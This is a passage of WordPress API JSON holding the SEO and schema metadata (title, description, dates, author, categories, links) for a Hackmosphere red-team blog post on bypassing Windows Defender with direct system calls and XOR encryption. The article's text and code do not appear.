Teaming\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/\",\"url\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/\",\"name\":\"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/image-1.png\",\"datePublished\":\"2025-04-07T22:00:19+00:00\",\"dateModified\":\"2026-06-12T17:21:48+00:00\",\"description\":\"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. Basic code is provided to start experimenting!\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/image-1.png\",\"contentUrl\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/image-1.png\",\"width\":979,\"height\":535,\"caption\":\"antivirus image\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/\",\"name\":\"Hackmosph\u00e8re\",\"description\":\"Votre s\u00e9curit\u00e9 nous tient hackeur.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#organization\",\"name\":\"Hackmosph\u00e8re\",\"url\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/LOGO-removebg-preview-1.png\",\"contentUrl\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/LOGO-removebg-preview-1.png\",\"width\":503,\"height\":497,\"caption\":\"Hackmosph\u00e8re\"},\"image\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.linkedin.com\\\/company\\\/hackmosphere\\\/posts\\\/?feedView=all\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#\\\/schema\\\/person\\\/5821c6ff778edf6f4ebd2ee1f69fa937\",\"name\":\"hackmin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g\",\"caption\":\"hackmin\"},\"sameAs\":[\"https:\\\/\\\/www.hackmosphere.fr\"],\"url\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/author\\\/hackmin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere","description":"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. Basic code is provided to start experimenting!","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/","og_locale":"en_US","og_type":"article","og_title":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere","og_description":"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. Basic code is provided to start experimenting!","og_url":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/","og_site_name":"Hackmosphere","article_published_time":"2025-04-07T22:00:19+00:00","article_modified_time":"2026-06-12T17:21:48+00:00","og_image":[{"width":979,"height":535,"url":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png","type":"image\/png"}],"author":"hackmin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"hackmin","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#article","isPartOf":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/"},"author":{"name":"hackmin","@id":"https:\/\/www.hackmosphere.fr\/en\/#\/schema\/person\/5821c6ff778edf6f4ebd2ee1f69fa937"},"headline":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1","datePublished":"2025-04-07T22:00:19+00:00","dateModified":"2026-06-12T17:21:48+00:00","mainEntityOfPage":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/"},"wordCount":1855,"commentCount":0,"publisher":{"@id":"https:\/\/www.hackmosphere.fr\/en\/#organization"},"image":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#primaryimage"},"thumbnailUrl":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png","articleSection":["Cyber Services","Red Team","Red Teaming"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/","url":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/","name":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere","isPartOf":{"@id":"https:\/\/www.hackmosphere.fr\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#primaryimage"},"image":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#primaryimage"},"thumbnailUrl":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png","datePublished":"2025-04-07T22:00:19+00:00","dateModified":"2026-06-12T17:21:48+00:00","description":"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. Basic code is provided to start experimenting!","breadcrumb":{"@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#primaryimage","url":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png","contentUrl":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png","width":979,"height":535,"caption":"antivirus image"},{"@type":"BreadcrumbList","@id":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.hackmosphere.fr\/en\/"},{"@type":"ListItem","position":2,"name":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1"}]},{"@type":"WebSite","@id":"https:\/\/www.hackmosphere.fr\/en\/#website","url":"https:\/\/www.hackmosphere.fr\/en\/","name":"Hackmosph\u00e8re","description":"Votre s\u00e9curit\u00e9 nous tient hackeur.","publisher":{"@id":"https:\/\/www.hackmosphere.fr\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.hackmosphere.fr\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.hackmosphere.fr\/en\/#organization","name":"Hackmosph\u00e8re","url":"https:\/\/www.hackmosphere.fr\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.hackmosphere.fr\/en\/#\/schema\/logo\/image\/","url":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2024\/06\/LOGO-removebg-preview-1.png","contentUrl":"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2024\/06\/LOGO-removebg-preview-1.png","width":503,"height":497,"caption":"Hackmosph\u00e8re"},"image":{"@id":"https:\/\/www.hackmosphere.fr\/en\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.linkedin.com\/company\/hackmosphere\/posts\/?feedView=all"]},{"@type":"Person","@id":"https:\/\/www.hackmosphere.fr\/en\/#\/schema\/person\/5821c6ff778edf6f4ebd2ee1f69fa937","name":"hackmin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d352c6befdd1a9af63e810874ec339d8413d31be99066723140b2b9686aaf8b1?s=96&d=mm&r=g","caption":"hackmin"},"sameAs":["https:\/\/www.hackmosphere.fr"],"url":"https:\/\/www.hackmosphere.fr\/en\/author\/hackmin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/posts\/2911","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/comments?post=2911"}],"version-history":[{"count":10,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/posts\/2911\/revisions"}],"predecessor-version":[{"id":4318,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/posts\/2911\/revisions\/4318"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/media\/2888"}],"wp:attachment":[{"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/media?parent=2911"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/categories?post=2911"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hackmosphere.fr\/en\/wp-json\/wp\/v2\/tags?post=2911"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}